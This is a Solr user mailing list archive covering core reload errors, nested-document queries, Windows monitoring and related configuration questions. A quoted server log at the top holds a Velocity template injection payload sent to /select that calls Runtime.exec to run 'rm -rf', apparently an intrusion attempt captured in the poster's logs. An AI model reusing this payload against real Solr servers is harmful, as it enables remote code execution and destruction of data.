[   x:my_core] o.a.s.c.SolrCore [my_core] Registered new searcher 
Searcher@45a874aa[my_core] 
main{ExitableDirectoryReader(UninvertingDirectoryReader(Uninverting(_0(8.3.1):C55967:[diagnostics={java.vendor=Ubuntu, 
os=Linux, java.version=11.0.6, 
java.vm.version=11.0.6+10-post-Ubuntu-1ubuntu118.04.1, lucene.version=8.3.1, 
os.arch=amd64, java.runtime.version=11.0.6+10-post-Ubuntu-1ubuntu118.04.1, 
source=flush, os.version=4.15.0-76-generic, 
timestamp=1585790971495}]:[attributes={Lucene50StoredFieldsFormat.mode=BEST_SPEED}])))}
2020-04-02 02:16:34.105 INFO  (qtp429353573-17) [   x:my_core] o.a.s.c.S.Request 
[my_core]  webapp=/solr path=/select 
params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('rm+-rf+/tmp/zzz'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity} 
hits=0 status=0 QTime=1
2020-04-02 02:16:34.106 INFO  (qtp429353573-17) [   x:my_core] o.a.s.c.PluginBag 
Going to create a new queryResponseWriter with {type = queryResponseWriter,name 
= velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, 
name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}
2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [   x:my_core] o.a.v.loader 
ResourceManager: unable to find resource 'custom.vm' in any resource loader.
2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [   x:my_core] 
o.a.s.s.HttpSolrCall null:java.io.IOException: Unable to find resource 'custom.vm'




Best,
Erick


On Apr 2, 2020, at 02:50, TK Solr  wrote:

I'm on Solr 8.3.1 running in non-solrcloud mode.

When I tried to reload an existing core from Admin UI's "Core Admin" by 
clicking Reload, after modifying the core's conf/managed-schema, no error was reported. 
But the newly added field type is not shown in the core's Analyzer section.

When I selected Logging from the sidebar, I saw errors like this for every core, 
not just the core I tried to reload.

null:java.io.IOException: Unable to find resource 'custom.vm'
 at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
 at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
 at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
 at 
org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
 at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
 at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
 at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
 at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)
 at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandle

Admin UI core loading fails

2020-04-02 Thread TK Solr

I'm on Solr 8.3.1 running in non-solrcloud mode.

When I tried to reload an existing core from Admin UI's "Core Admin" by clicking 
Reload, after modifying the core's conf/managed-schema, no error was reported. 
But the newly added field type is not shown in the core's Analyzer section.


When I selected Logging from the sidebar, I saw errors like this for every core, not 
just the core I tried to reload.


null:java.io.IOException: Unable to find resource 'custom.vm'
    at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
    at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
    at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)

    at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
    at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
    at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)

    at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:540)

I could not find any mention of custom.vm in any files under any core's conf 
directory.


After I restarted Solr, the core loaded without an error and I can see the newly 
added field type.


What could be the cause of these errors that only happen with the Reload 
button?

TK




Re: How to retrieve nested documents (parents and their children together) ?

2018-07-25 Thread TK Solr

Ah, that's what _root_ is for! I was wondering.

Thank you!
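
A hedged sketch of the delete-by-query this suggests, using the _root_:parent-id query quoted below so the parent and its children go together; the core name and the commit flag are assumptions, not details from this thread:

  curl -X POST -H 'Content-Type: text/xml' \
    'http://localhost:8983/solr/mycore/update?commit=true' \
    -d '<delete><query>_root_:parent-id</query></delete>'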


On 7/25/18 2:36 PM, Mikhail Khludnev wrote:

_root_:parent-id

Thu, 26 Jul 2018, 1:33 TK Solr :


The child doc transformer worked great. Thank you.

In my experiment, posting <delete><id>parent-id</id></delete> to the update
end point only deleted the parent doc. Do I insert a complex join query from id
to _version_ and delete all the docs of the matching _version_?


On 7/24/18 9:27 PM, TK Solr wrote:

Thank you. I'll try the child doc transformer.

On a related question, if I delete a parent document, will its children

be

deleted also? Or do I have to have a parent_id field in each child so

that the

child docs can be deleted?


On 7/22/18 10:05 AM, Mikhail Khludnev wrote:

Hello,
Check [child]


https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory

or [subquery].
Although, it's worth to put reference to it somewhere in blockjoin
qparsers.
Documentation patches are welcome.


On Sun, Jul 22, 2018 at 10:25 AM TK Solr  wrote:


https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser


talks about {!parent which=<allParents>}<some child docs>, which returns parent docs
only, and {!child of=<allParents>}<some parent docs>, which returns child docs only.

Is there a way to retrieve the matched documents in the original, nested form?
Using the sample document, is there a way to get:


<add>
  <doc>
    <field name="id">1</field>
    <field name="title">Solr has block join support</field>
    <field name="content_type">parentDocument</field>
    <doc>
      <field name="id">2</field>
      <field name="comments">SolrCloud supports it too!</field>
    </doc>
  </doc>
</add>


rather than just the parent or the child docs?









Re: How to retrieve nested documents (parents and their children together) ?

2018-07-25 Thread TK Solr

The child doc transformer worked great. Thank you.

In my experiment, posting <delete><id>parent-id</id></delete> to the update 
end point only deleted the parent doc. Do I insert a complex join query from id 
to _version_ and delete all the docs of the matching _version_?



On 7/24/18 9:27 PM, TK Solr wrote:

Thank you. I'll try the child doc transformer.

On a related question, if I delete a parent document, will its children be 
deleted also? Or do I have to have a parent_id field in each child so that the 
child docs can be deleted?



On 7/22/18 10:05 AM, Mikhail Khludnev wrote:

Hello,
Check [child]
https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory 


or [subquery].
Although, it's worth to put reference to it somewhere in blockjoin
qparsers.
Documentation patches are welcome.


On Sun, Jul 22, 2018 at 10:25 AM TK Solr  wrote:

https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser 



talks about {!parent which=<allParents>}<some child docs>, which returns parent docs
only, and {!child of=<allParents>}<some parent docs>, which returns child docs only.

Is there a way to retrieve the matched documents in the original, nested
form?
Using the sample document, is there a way to get:


<add>
  <doc>
    <field name="id">1</field>
    <field name="title">Solr has block join support</field>
    <field name="content_type">parentDocument</field>
    <doc>
      <field name="id">2</field>
      <field name="comments">SolrCloud supports it too!</field>
    </doc>
  </doc>
</add>



rather than just the parent or the child docs?









Re: How to retrieve nested documents (parents and their children together) ?

2018-07-24 Thread TK Solr

Thank you. I'll try the child doc transformer.

On a related question, if I delete a parent document, will its children be 
deleted also? Or do I have to have a parent_id field in each child so that the 
child docs can be deleted?



On 7/22/18 10:05 AM, Mikhail Khludnev wrote:

Hello,
Check [child]
https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory
or [subquery].
Although, it's worth to put reference to it somewhere in blockjoin
qparsers.
Documentation patches are welcome.


On Sun, Jul 22, 2018 at 10:25 AM TK Solr  wrote:


https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser

talks about {!parent which=<allParents>}<some child docs>, which returns parent docs
only, and {!child of=<allParents>}<some parent docs>, which returns child docs only.

Is there a way to retrieve the matched documents in the original, nested
form?
Using the sample document, is there a way to get:


<add>
  <doc>
    <field name="id">1</field>
    <field name="title">Solr has block join support</field>
    <field name="content_type">parentDocument</field>
    <doc>
      <field name="id">2</field>
      <field name="comments">SolrCloud supports it too!</field>
    </doc>
  </doc>
</add>



rather than just the parent or the child docs?







How to retrieve nested documents (parents and their children together) ?

2018-07-22 Thread TK Solr

https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser

talks about {!parent which=<allParents>}<some child docs>, which returns parent docs 
only, and {!child of=<allParents>}<some parent docs>, which 
returns child docs only.


Is there a way to retrieve the matched documents in the original, nested form? 
Using the sample document, is there a way to get:



<add>
  <doc>
    <field name="id">1</field>
    <field name="title">Solr has block join support</field>
    <field name="content_type">parentDocument</field>
    <doc>
      <field name="id">2</field>
      <field name="comments">SolrCloud supports it too!</field>
    </doc>
  </doc>
</add>


rather than just the parent or the child docs?




Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-08 Thread TK Solr

Mikhail,

Actually, your suggestion worked! I was making a typo on the field name. Thank 
you very much!


TK

p.s. I have found a mention of _query_ "magic field" in the Solr Reference Guide
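
For readers of the archive, a hedged sketch of how the working combination of two block-join clauses might be sent with curl; the core name and the q1/q2 parameter names are placeholders, and --data-urlencode addresses the escaping concern raised later in the thread:

  curl -G 'http://localhost:8983/solr/mycore/select' \
    --data-urlencode 'q=_query_:"{!parent which=isParent:true v=$q1}" AND _query_:"{!parent which=isParent:true v=$q2}"' \
    --data-urlencode 'q1=attrname:genre AND attrvalue:drama' \
    --data-urlencode 'q2=attrname:country AND attrvalue:USA'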


On 7/8/18 11:04 AM, TK Solr wrote:

Thank you.

This is more promising because I see the second clause in parsedquery. But it 
is hitting zero documents.


The debug query output looks like this. explain is empty:


rawquerystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre 
AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"querystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre 
AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"parsedquery":"+AllParentsAware(ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama))) +AllParentsAware(ToParentBlockJoinQuery 
(+(+attrname:country +attrvalue:usa)))",
"parsedquery_toString":"+ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama)) +ToParentBlockJoinQuery (+(+attrname:country 
+attrvalue:usa))",

"explain":{},
"QParser":"LuceneQParser",
"timing":{...}


Could you tell me what _query_ does?


On 7/4/18 10:25 PM, Mikhail Khludnev wrote:

agh... It's my pet peeve.
what about
q= {!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}
AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}

^leading space
q=_query_:{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} AND _query_:{!parent which="isParent:true"
v='attrname:country
AND attrvalue:USA'}
q=+{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} +{!parent
which="isParent:true" v='attrname:country AND attrvalue:USA'}
Beware of escape encoding. it might require to replace + to %2b.
Post debug=query response here.

On Tue, Jul 3, 2018 at 9:25 PM TK Solr  wrote:


Thank you, Mikhail. But this didn't work. The first {!parent which='...'
v='...'} alone works. But the second {!parent ...} clause is completely
ignored.
In fact, if I turn on debugQuery, rawquerystring and querystring have the
second
query but parsedquery and parsedquery_toString only have the first query.
BTW,
does the v parameter work in place of the query following {!parsername} for
any parser?


On 7/3/18 12:42 PM, Mikhail Khludnev wrote:

q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}

AND

{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}








Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-08 Thread TK Solr

Thank you.

This is more promising because I see the second clause in parsedquery. But it is 
hitting zero documents.


The debug query output looks like this. explain is empty:


rawquerystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre AND 
attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"querystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre 
AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"parsedquery":"+AllParentsAware(ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama))) +AllParentsAware(ToParentBlockJoinQuery (+(+attrname:country 
+attrvalue:usa)))",
"parsedquery_toString":"+ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama)) +ToParentBlockJoinQuery (+(+attrname:country +attrvalue:usa))",

"explain":{},
"QParser":"LuceneQParser",
"timing":{...}


Could you tell me what _query_ does?


On 7/4/18 10:25 PM, Mikhail Khludnev wrote:

agh... It's my pet peeve.
what about
q= {!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}
AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}

^leading space
q=_query_:{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} AND _query_:{!parent which="isParent:true"
v='attrname:country
AND attrvalue:USA'}
q=+{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} +{!parent
which="isParent:true" v='attrname:country AND attrvalue:USA'}
Beware of escape encoding. it might require to replace + to %2b.
Post debug=query response here.

On Tue, Jul 3, 2018 at 9:25 PM TK Solr  wrote:


Thank you, Mikhail. But this didn't work. The first {!parent which='...'
v='...'} alone works. But the second {!parent ...} clause is completely
ignored.
In fact, if I turn on debugQuery, rawquerystring and querystring have the
second
query but parsedquery and parsedquery_toString only have the first query.
BTW,
does the v parameter work in place of the query following {!parsername} for
any parser?


On 7/3/18 12:42 PM, Mikhail Khludnev wrote:

q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}

AND

{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}






Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-03 Thread TK Solr
Thank you, Mikhail. But this didn't work. The first {!parent which='...' 
v='...'} alone works. But the second {!parent ...} clause is completely ignored.
In fact, if I turn on debugQuery, rawquerystring and querystring have the second 
query but parsedquery and parsedquery_toString only have the first query. BTW, 
does the v parameter work in place of the query following {!parsername} for 
any parser?



On 7/3/18 12:42 PM, Mikhail Khludnev wrote:

q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND

{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}




Parent-child query; subqueries on child docs of the same set of fields

2018-07-03 Thread TK Solr

I have a document with child documents like:

  
<add>
  <doc>
    <field name="id">maindoc_121</field>
    <field name="isParent">true</field>
    <doc>
      <field name="id">child_121_1</field>
      <field name="attrname">genre</field>
      <field name="attrvalue">drama</field>
    </doc>
    <doc>
      <field name="id">child_121_2</field>
      <field name="attrname">country</field>
      <field name="attrvalue">USA</field>
    </doc>
  </doc>
</add>


The child documents have the same set of fields.

I can write a query that has a child which has attrname=genre and 
attrvalue=drama as

q={!parent which="isParent:true"} attrname:genre AND attrvalue:drama


But if I want to add another condition that the parent must have another child 
that has certain values, what do I do?


q={!parent which="isParent:true"} attrname:genre AND attrvalue:drama AND 
attrname:country AND attrvalue:USA


would mean a query for a parent where one of the children must match. I want a 
parent that has two children, one matched by one sub-query and the other 
matched by another sub-query.


TK




Re: Windows monitoring software for Solr recommendation

2018-06-05 Thread TK Solr

On 6/5/18 10:31 AM, Christopher Schultz wrote:


How about Apache procrun/commons-daemon?

https://commons.apache.org/proper/commons-daemon/procrun.html

Thank you, I'll take a look.

On 6/5/18 1:51 PM, Shawn Heisey wrote:

The best bet for
an easy service install is probably NSSM.  It's got a name that some
people hate, but a lot of people use it successfully.

https://nssm.cc/

Thank you, I'll take a look at this one too.


You mentioned looking at a GC log.  Can you provide that entire log for
analysis?
Thank you for your offer to help. But I don't really think this is a memory 
related issue.
I visualized the GC log with GCMV (GCVM?) and the graph shows Solr was using 
less than half of the heap space at the peak.

This Solr doesn't get much query traffic and no indexing was running.
It's really a sudden death of JVM with no trace.

The only concern I have is that the Solr config files are those of Solr 5.x and 
they just upgraded to Solr 6.6. But I understand Solr 6 supports a Solr 5-compatible 
mode. Have there been any issues with the compatibility mode?


TK





Windows monitoring software for Solr recommendation

2018-06-05 Thread TK Solr
My client's Solr 6.6 running on a Windows server is mysteriously crashing 
without any JVM crash log. No unusual activities recorded in solr.log. GC log 
does not indicate the OOM situation. It's a simple single-core, single node 
deployment (no solrCloud). It has very light load. No indexing activities were 
running near the crash time.


After exhausting all possibilities (suggestions are welcome), I'd like to 
recommend installing some monitoring software, but I couldn't find one that works 
on Windows for Java-based software. (Some I found can monitor only EXEs. Since 
all Java software shares the same EXE, java.exe, those won't work.) Can anyone 
recommend some? It doesn't need to be free but can't be very expensive, since 
it's a very lightly used Solr system. Perhaps less than $500?


TK




Re: Run solr server using Java program

2018-04-21 Thread TK Solr
The solr.cmd script starts Solr by running java -jar start.jar, whose MANIFEST 
file tells the java command that its main class is 
org.eclipse.jetty.start.Main.


So, I would think your Java program should be able to start Solr (Jetty, really) 
by calling org.eclipse.jetty.start.Main.main(argv).


But a big question is why you'd like to do that.

TK

On 4/18/18 7:34 AM, rameshkjes wrote:

Hi guys,

I am able to run the solr instance, add the core and import the data
manually. But I want to do everything with the help of Java program, I
searched a lot but did not find any relevant answer.

In order to run the Solr server, I execute the following command inside the
directory D:\software\solr-7.2.0\solr-7.2.0\bin:

  solr.cmd -s "C:\Users\lucky\github\myproject\solr-config"

After that I access http://localhost:8983/solr/

and select the name of the core, which is "demo",

and then I select the dataimport tab and "execute" to import the documents.

The first thing I tried was to run the Solr server using a Java program, which
I am unable to do. Could anyone please help with that?

I am using Solr 7.2.0

Thanks



--
Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html





Minimum memory requirement

2018-01-31 Thread TK Solr
On my AWS t2.micro instance, which only has 1 GB memory, I installed Solr (4.7.1 
- please don't ask) and tried to run it in sample directory as java -jar 
start.jar. It exited shortly due to lack of memory.


How much memory does Solr require to run, with empty core?
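
A minimal sketch of one thing worth trying on a 1 GB instance: cap the heap explicitly so the JVM does not try to reserve more than the machine can give (256m is an arbitrary starting point, not a tested value for 4.7.1):

  java -Xms256m -Xmx256m -jar start.jar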

TK




literal.* use in posting PDF files

2018-01-30 Thread TK Solr
I have a schema.xml defined to require two fields, "id" and "libDocumentID". 
solrconfig.xml is the standard one.


Using curl, I tried posting a PDF file like this:

curl 
'http://localhost:8983/solr/update/extract?literal.id=foodf=foo=true' 
-F "myfile=@foo.pdf"


but I got:

[doc=foo.pdf] missing required field: libDocumentID (HTTP status 400)


Can I specify more than one literal.name=value? Do I have to define 
literal.libDocumentID in solrconfig.xml?
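
For what it's worth, multiple literal.<field> parameters can be passed on the same extract request; a hedged sketch (the libDocumentID value LIB-123 is made up):

  curl 'http://localhost:8983/solr/update/extract?literal.id=foo&literal.libDocumentID=LIB-123&commit=true' \
    -F "myfile=@foo.pdf"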


I'm using Solr 5.3.1 (please don't ask...).

TK




Bitnami, or other Solr on AWS recommendations?

2018-01-26 Thread TK Solr
If I want to deploy Solr on AWS, do people recommend using the prepackaged 
Bitnami Solr image? Or is it better to install Solr manually on a computer 
instance? Or are there a better way?


TK




Re: Extended characters

2017-10-29 Thread TK Solr

I think you can use ASCIIFoldingFilter

http://lucene.apache.org/core/6_2_0/analyzers-common/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilter.html

by inserting its factory in your schema.

http://lucene.apache.org/core/6_2_0/analyzers-common/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilterFactory.html

I would suggest making a separate field for this so that exact match can be 
boosted.

On 10/29/17 10:56 AM, Robert Brown wrote:

Hi,

I have a text field in my index containing extended characters, which I'd like 
to match against when searching without the extended characters.


e.g.  field contains "Ensō" which I want to match when searching for just 
"enso".

My current config for that field (type) is given below:


[The fieldType definition was mangled by the list archive. What survives shows 
autoGeneratePhraseQueries="true", a synonym filter (index_synonyms.txt, 
ignoreCase="true", expand="true"), and stop filters (lang/stopwords_en.txt) on 
both the index and query analyzer chains.]


Kuro


Re: Where is schema.xml ?

2015-06-17 Thread TK Solr

On 6/17/15, 2:35 PM, Upayavira wrote:

Do you have a managed-schema file, or such?

You may have used the configs that have a managed schema, i.e. one that
allows you to change the schema via HTTP.
I do see a file named managed-schema, without the .xml extension, in the conf 
directory.

Its content does look like a schema.xml file.
Is this the initial content of the in-memory schema, which the Schema API then 
updates dynamically?





Where is schema.xml ?

2015-06-17 Thread TK Solr
With Solr 5.2.0, I ran:
bin/solr create -c foo
This created solrconfig.xml in server/solr/foo/conf directory.
Other configuration files such as synonyms.txt are found in this directory too.

But I don't see schema.xml. Why is schema.xml handled differently?

I am guessing
server/solr/configsets/sample_techproducts_configs/conf/schema.xml
is used by the foo core because it knows about the cat field.
Are the template files in sample_techproducts_configs considered standard?

TK



Re: YAJar

2015-06-08 Thread TK Solr

Maybe the Maven Shade plugin can help your situation?
https://maven.apache.org/plugins/maven-shade-plugin/
http://stackoverflow.com/questions/13620281/what-is-the-maven-shade-plugin-used-for-and-why-would-you-want-to-relocate-java

Create a self-contained jar with guava package renamed.
Not very pretty but it should work.

On 5/25/15, 9:14 PM, Robust Links wrote:

I am stuck in Yet Another Jarmagedon of SOLR. this is a basic question. i
noticed solr 5.0 is using guava 14.0.1. My app needs guava 18.0. What is
the pattern to override a jar version uploaded into jetty?

I am using maven, and solr is being started the old way

java -jar start.jar
-Dsolr.solr.home=...
-Djetty.home=...

I tried to edit jetty's start.config (then run java
-DSTART=/my/dir/start.config
-jar start.jar) but got no where...

any help would be much appreciated

Peyman





Re: [solr 5.1] Looking for full text + collation search field

2015-05-29 Thread TK Solr


On 5/21/15, 5:19 AM, Björn Keil wrote:

Thanks for the advice. I have tried the field type and it seems to do what it 
is supposed to in combination with a lower case filter.

However, that raises another slight problem:

German umlauts are supposed to be treated slightly different for the purpose of searching than for sorting. For sorting 
a normal ICUCollationField with standard rules should suffice*, for the purpose of searching I cannot just replace an 
ü with a u, ü is supposed to equal ue, or, in terms of 
RuleBasedCollators, there is a secondary difference.


I haven't used this personally but GermanNormalizationFilter seems to do the job
https://lucene.apache.org/core/5_1_0/analyzers-common/org/apache/lucene/analysis/de/GermanNormalizationFilter.html






Re: solr 5.x on glassfish/tomcat instead of jetty

2015-05-22 Thread TK Solr


On 5/21/15, 5:26 AM, Steven White wrote:

Hi TK,

Can you share the thread you found on this WAR topic?


Steve,
Actually, that was my mistake.  I still don't know why WARs are bad.

In the thread Solr 5.0, Jetty and WAR, which you started and are familiar 
with,
https://wiki.apache.org/solr/WhyNoWar
was mentioned. So I thought that's it!
But it turned out this wiki page was a blank page.

TK



Re: solr 5.x on glassfish/tomcat instead of jetty

2015-05-20 Thread TK Solr

On 5/20/15, 8:21 AM, Shawn Heisey wrote:
As of right now, there is still a .war file. Look in the server/webapps 
directory for the .war, server/lib/ext for logging jars, and server/resources 
for the logging configuration. Consult your container's documentation to learn 
where to place these things. At some point in the future, such deployments 
will no longer be possible,
While we are still on this subject, I have been aware there has been an anti-WAR 
movement in the tech community, but I don't quite understand where this movement 
is coming from. Can someone point me to some website summarizing why WARs are bad?


Thanks.



Re: solr 5.x on glassfish/tomcat instead of jetty

2015-05-20 Thread TK Solr

Never mind. I found that thread. Sorry for the noise.

On 5/20/15, 5:56 PM, TK Solr wrote:

On 5/20/15, 8:21 AM, Shawn Heisey wrote:
As of right now, there is still a .war file. Look in the server/webapps 
directory for the .war, server/lib/ext for logging jars, and server/resources 
for the logging configuration. Consult your container's documentation to 
learn where to place these things. At some point in the future, such 
deployments will no longer be possible,
While we are still on this subject, I have been aware there has been an 
anti-WAR movement in the tech community, but I don't quite understand where this 
movement is coming from. Can someone point me to some website summarizing why 
WARs are bad?


Thanks.





Re: Solr Multilingual Indexing with one field- Guidance

2015-05-12 Thread TK Solr


On 5/7/15, 11:23 AM, Kuntal Ganguly wrote:

1) Is this a correct approach to do it? Or i'm missing something?

Does the user want to see documents that he/she doesn't understand?
Words such as doctor, taxi, etc. are common among many languages in 
Europe.
Would a Spanish user want to see English documents?
Of course this issue can be worked around by having a separate language field.

How do you handle word collisions among languages?
Kind in German means child in English. If a German user searches for articles
about children, they will find lots of unrelated English
articles about someone being kind.
This too can be worked around by having a language field.

By default, Solr/Lucene hits are sorted by relevancy score, and
the score calculation uses IDF. If a search term appears in many documents,
the score is low. Because virtually all German documents contain die, the 
particle,
the score of the English word die will be low as well.


2) Can you give me an example where there will be problem with this above
new field type? A use-case/scenario with example will be very helpful.


If you have lots of Japanese documents indexed, try searching 京都 (Kyoto).
You will find many documents about Tokyo (東京) because the government
of the metropolitan Tokyo area is spelled as 東京都 = Tokyo Capital, which
generates two bigrams, 東京 and 京都.

Kuro





Lucene test framework documentation?

2015-01-08 Thread TK Solr
Is there any good documentation about the Lucene Test Framework?
I can only find API docs.
Mimicking the unit tests I've found in Lucene trunk, I tried to write
a unit test for a TokenFilter I am writing. But it is failing
with an error message like:
java.lang.AssertionError: close() called in wrong state: SETREADER
at 
__randomizedtesting.SeedInfo.seed([2899FF2F02A64CCB:47B7F94117CE7067]:0)
at 
org.apache.lucene.analysis.MockTokenizer.close(MockTokenizer.java:261)
at org.apache.lucene.analysis.TokenFilter.close(TokenFilter.java:58)

During a few rounds of trial and error, I got an error message saying that the
Test Framework JAR has to be before Lucene Core on the classpath. And the above
stack trace indicates that the Test Framework has its own Analyzer implementation,
and it makes a certain assumption, but it is not clear what that assumption is.

This exception was thrown from one of these lines, I believe:
    TokenStream ts = deuAna.tokenStream(text, new StringReader(testText));
    TokenStreamToDot tstd = new TokenStreamToDot(testText, ts, new PrintWriter(System.out));
    ts.close();

(I'm not too sure what TokenStreamToDot is about. I was hoping it would
dump a token stream.)

Kuro